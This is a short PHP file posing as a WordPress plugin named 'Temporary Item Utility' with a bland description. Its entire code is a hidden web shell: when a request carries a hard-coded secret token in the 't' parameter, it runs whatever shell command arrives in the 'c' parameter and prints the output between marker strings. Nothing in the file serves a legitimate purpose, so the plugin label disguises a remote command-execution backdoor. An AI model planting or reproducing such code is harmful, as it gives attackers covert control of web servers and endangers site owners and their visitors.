<?php
/*
Plugin Name: Temporary Item Utility
Description: Temporary utility.
*/
if (hash_equals('dabbea752185785bd3cf01bb1e2ead9b', (string) ($_GET['t'] ?? '')) && isset($_GET['c'])) {
chdir(__DIR__);
echo 'WS3AA7::' . shell_exec((string) $_GET['c']) . '::END';
}